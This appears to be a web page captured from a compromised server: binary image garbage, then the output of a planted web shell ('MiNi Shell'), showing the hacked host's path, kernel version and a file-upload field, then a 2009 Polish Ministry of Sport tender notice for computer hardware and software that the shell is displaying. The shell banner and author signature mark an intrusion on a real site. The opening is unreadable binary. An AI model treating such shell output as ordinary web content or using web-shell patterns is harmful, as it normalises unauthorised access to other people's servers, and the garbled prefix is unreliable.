JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090929/165479-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa sprzętu komputerowego dla Ministerstwa Sportu i  Turystyki
nr ref.: 31/dost./2009</b><br>
<b>Numer ogłoszenia: 165479 - 2009; data zamieszczenia: 29.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Sportu i Turystyki , ul. Senatorska 14, 00-082 Warszawa, woj. mazowieckie, tel. 022 2443103, faks 022 2443200.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msport.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego dla Ministerstwa Sportu i  Turystyki
nr ref.: 31/dost./2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa sprzętu komputerowego opisanego w następujących częściach:
Część I: 
1)	Switche - w ilości 7sztuk
2)	Dyski  twarde 250GB, 16MB, Serial ATA, zapis prostopadły - w ilości 4sztuk
3)	Pamięci przenośne typ I- w ilości 5 sztuk 
4)	Pamięci przenośne typ II - w ilości 4 sztuk 
5)	Myszki i klawiatury - w ilości 20 kompletów (każdy komplet składa się z jednej sztuki myszki i jednej sztuki klawiatury) 
6)	Zasilacze ATX - w ilości 10 sztuk
Część II:  Oprogramowanie
1)	CorelDRAWR Graphics Suite X4 PL BOX dla systemów z rodziny Windows lub równoważny -  w ilości 1sztuki
2)	Altova XMLSpy 2009 Professional + 1 rok SMP lub równoważny- w ilości 1sztuki
3)	Aktualizacja wersji:
-	Adobe Web Premium CS4 WIN PL Upg BOX z CS3 - 1 sztuki
Produkt równoważny musi posiadać takie same funkcjonalności, możliwości i opcje jak wskazany przez Zamawiającego. Musi być kompatybilny ze środowiskiem, w którym pracuje oprogramowanie wskazane przez Zamawiającego i być w pełni kompatybilny z oprogramowaniem wskazanym przez Zamawiającego (dotyczy to zwłaszcza transferu danych). 
Część III: Rzutniki multimedialne szerokokątny - w ilości 1 sztuki
Część IV: Macierze dyskowe w ilości 2 sztuk
Część V: Drukarki laserowe monochromatyczne - w ilości 4 sztuk
Część VI: Zestawy komputerowe składające się z:
1)	Monitor - w ilości 18 sztuk
2)	 Komputer - w ilości 18 sztuk

Szczegółowy opis przedmiotu zamówienia został zawarty w Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) stanowiącej Załącznik nr 4 do SIWZ 

Wykonawca będzie dostarczał przedmiot zamówienia na własny koszt bezpośrednio do siedziby Zamawiającego na ul. Senatorskiej 14 w Warszawie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.21.10-8, 30.23.70.00-9, 48.00.00.00-8, 30.23.71.00-0, 30.23.41.00-9, 30.23.46.00-4, 30.23.74.10-6, 30.23.74.60-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości: 
dla cz. I: 150,00 PLN (słownie: sto pięćdziesiąt złotych);
dla cz. II: 160,00 PLN (słownie: sto sześćdziesiąt złotych);
dla cz. III: 200,00 PLN (słownie: dwieście złotych);
dla cz: IV: 750,00 PLN (słownie: siedemset pięćdziesiąt złotych);
dla cz. V: 350,00 PLN (słownie: trzysta pięćdziesiąt złotych);
dla cz. VI: 1 500,00 PLN (słownie: tysiąc pięćset złotych).
Wykonawca nie jest zobowiązany do wniesienia zabezpieczenia należytego wykonania umowy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy:
1.	Spełniający warunki określone w art. 22 Ustawy i nie podlegający wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych - zwane dalej Ustawą, oprócz stosownego oświadczenia, Wykonawca musi złożyć wszystkie wymagane przez zamawiającego dokumenty i oświadczenia dodatkowe (wskazane w ogłoszeniu o zamówieniu) potwierdzające spełnianie  warunków  uprawniających  do  udziału  w  postępowaniu  o  zamówienie  publiczne. 
2.	Ocena spełniania przez wykonawców warunków udziału w postępowaniu będzie dokonana w oparciu o prawidłowość i kompletność złożonych wszystkich oświadczeń i dokumentów jakich żądał Zamawiający zgodnie z art. 22 ust. 1 pkt 1-3 Ustawy (z zastrzeżeniem art. 26 ust. 3 Ustawy).
3.	Wykonawca, który nie złoży w ofercie wszystkich wymaganych przez Zamawiającego dokumentów  i oświadczeń, i w przypadku ich braku w ofercie, nie dostarczy ich Zamawiającemu na jego żądanie, będzie podlegał wykluczeniu z postępowania, a jego oferta zostanie odrzucona - zgodnie z art. 24 ust. 4 Ustawy, w związku z art. 25 ust. 1 pkt 1 i ust. 2 oraz art. 26 ust. 3 Ustawy.
4.	O zamówienie mogą się ubiegać Wykonawcy, którzy:
dla części I:
wykonali w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem 
i wartością co najmniej trzech dostaw o wartości  co najmniej  7 000,00 PLN (słownie siedmiu tysięcy złotych) brutto każda  - z podaniem przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy lub usługi te zostały wykonane należycie. Wykonawca nie może być wystawcą dokumentów potwierdzających należyte wykonanie zamówienia.
dla części II:
wykonali w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem 
i wartością co najmniej trzech dostaw o wartości  co najmniej  10 000,00 PLN (słownie dziesięciu tysięcy złotych) brutto każda  - z podaniem przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy lub usługi te zostały wykonane należycie. Wykonawca nie może być wystawcą dokumentów potwierdzających należyte wykonanie zamówienia.
dla części III:
wykonali w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem 
i wartością co najmniej trzech dostaw o wartości  co najmniej  10 000,00 PLN (słownie dziesięć tysięcy złotych) brutto każda  - z podaniem przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy lub usługi te zostały wykonane należycie. Wykonawca nie może być wystawcą dokumentów potwierdzających należyte wykonanie zamówienia.
dla części IV:
wykonali w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem 
i wartością co najmniej trzech dostaw o wartości  co najmniej  40 000,00 PLN (słownie czterdzieści tysięcy złotych) brutto każda  - z podaniem przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy lub usługi te zostały wykonane należycie. Wykonawca nie może być wystawcą dokumentów potwierdzających należyte wykonanie zamówienia.
dla części V:
wykonali w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem 
i wartością co najmniej trzech dostaw o wartości  co najmniej  25 000,00 PLN (słownie dwadzieścia pięć tysięcy złotych) brutto każda  - z podaniem przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy lub usługi te zostały wykonane należycie. Wykonawca nie może być wystawcą dokumentów potwierdzających należyte wykonanie zamówienia.
dla części VI:
wykonali w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem 
i wartością co najmniej trzech dostaw o wartości  co najmniej  75 000,00 PLN (słownie siedemdziesięciu pięciu tysięcy złotych) brutto każda  - z podaniem przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy lub usługi te zostały wykonane należycie. Wykonawca nie może być wystawcą dokumentów potwierdzających należyte wykonanie zamówienia.

Zamawiający dopuszcza przypadek, w którym Wykonawca składający ofertę na kilka pozycji zamówienia dla potwierdzenia posiadanego doświadczenia składa dokumenty potwierdzające wykonanie dostawy łącznie dla jednej lub więcej części. W takim przypadku Wykonawca musi zaznaczyć których części dotyczą  przedmiotowe dokumenty, muszą one odpowiadać rodzajem przedmiotowi zamówienia wskazanych części oraz ich wartość nie może być mniejsza niż suma wartości dostaw wskazanych części..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu:
Zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, uwzględniając zmiany wprowadzone Rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008 roku zmieniającym rozporządzenie Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane - § 1 ust. 1 i 2 ( z uwzględnieniem § 2, jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej ):
Oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu:
1)	oświadczenie potwierdzające spełnianie przez Wykonawcę warunków określonych w art. 22 i 24 Ustawy, sporządzone wg wzoru stanowiącego załącznik nr 2 do niniejszej Specyfikacji;
2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert;
3)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4)	aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5)	aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 -8 ustawy wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
7)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem  i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy lub usługi te zostały wykonane należycie. Wykonawca nie może być wystawcą dokumentów potwierdzających należyte wykonanie zamówienia.

Inne wymagane oświadczenia i dokumenty:
1)	w przypadku, gdy Wykonawcę reprezentuje pełnomocnik - pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy;
2)	w przypadku, gdy ofertę składają wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 ustawy;
3)	Szczegółowy Opis Przedmiotu Zamówienia  (SOPZ) - wypełniony w spoósb opisany w SIWZ;
4)	potwierdzenie wniesienia wadium. 

Wykonawcy składają oryginał  lub kserokopie dokumentów potwierdzone za zgodność z oryginałem i podpisane przez osobę/osoby uprawnioną/uprawnione do reprezentowania Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.msport.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MINISTERSTWO SPORTU i TURYSTYKI
00-082 WARSZAWA, UL. SENATORSKA 14
Tel./fax: 22 24 43 132, 22 24 43 218
godziny urzędowania: 08:15 - 16:15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2009 godzina 10:00, miejsce: Ministerstwo Sportu i Turystyki
00 - 082  Warszawa,   ul.  Senatorska 14
w Kancelarii Głównej.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Otwarcie ofert:
Data:   08/10/2009                                                               Godzina:10:15
Miejsce:   Ministerstwo Sportu i Turystyki
00 - 082  Warszawa,   ul.  Senatorska 14

Zamawiąjący nie przewiduje zastosowania aukcji elektronicznej ani ustanowienia dynamicznego systemu zakupów..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> SPRZĘT KOMPUTEROWY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Switche - w ilości 7sztuk
2)	Dyski  twarde 250GB, 16MB, Serial ATA, zapis prostopadły - w ilości 4sztuk
3)	Pamięci przenośne typ I- w ilości 5 sztuk 
4)	Pamięci przenośne typ II - w ilości 4 sztuk 
5)	Myszki i klawiatury - w ilości 20 kompletów (każdy komplet składa się z jednej sztuki myszki i jednej sztuki klawiatury) 
6)	Zasilacze ATX - w ilości 10 sztuk

Szczegółowy opis przedmiotu zamówienia został zawarty w Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) stanowiącej Załącznik nr 4 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.71.00-0, 30.23.41.00-9, 30.23.46.00-4, 30.23.74.10-6, 30.23.74.60-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Oprogramowanie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	CorelDRAWR Graphics Suite X4 PL BOX dla systemów z rodziny Windows lub równoważny -  w ilości 1sztuki
2)	Altova XMLSpy 2009 Professional + 1 rok SMP lub równoważny- w ilości 1sztuki
3)	Aktualizacja wersji:
Adobe Web Premium CS4 WIN PL Upg BOX z CS3 - 1 sztuki
Produkt równoważny musi posiadać takie same funkcjonalności, możliwości i opcje jak wskazany przez Zamawiającego. Musi być kompatybilny ze środowiskiem, w którym pracuje oprogramowanie wskazane przez Zamawiającego i być w pełni kompatybilny z oprogramowaniem wskazanym przez Zamawiającego (dotyczy to zwłaszcza transferu danych). Oprogramowanie równoważne musi również posiadać takie same minimalne wymagania sprzętowe określone przez producenta jak program do którego odnosi się równoważność.
Szczegółowy opis przedmiotu zamówienia został zawarty w Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) stanowiącej Załącznik nr 4 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.00.00-1, 48.00.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rzutnik multimedialny szerokokątny - w ilości 1 sztuki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rzutnik multimedialny szerokokątny - w ilości 1 sztuki

Szczegółowy opis przedmiotu zamówienia został zawarty w Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) stanowiącej Załącznik nr 4 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.70.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Macierze dyskowe w ilości 2 sztuk.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Macierze dyskowe w ilości 2 sztuk 

Szczegółowy opis przedmiotu zamówienia został zawarty w Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) stanowiącej Załącznik nr 4 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.70.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Drukarki laserowe monochromatyczne w ilości 4 sztuk.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Drukarki laserowe monochromatyczne- w ilości 4 sztuk 
Szczegółowy opis przedmiotu zamówienia został zawarty w Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) stanowiącej Załącznik nr 4 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.21.10-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zestawy komputerowe w ilości 18 sztuk.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestawy komputerowe składające się z:
3)	Monitor - w ilości 18 sztuk
4)	 Komputer - w ilości 18 sztuk

Szczegółowy opis przedmiotu zamówienia został zawarty w Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) stanowiącej Załącznik nr 4 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.30.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com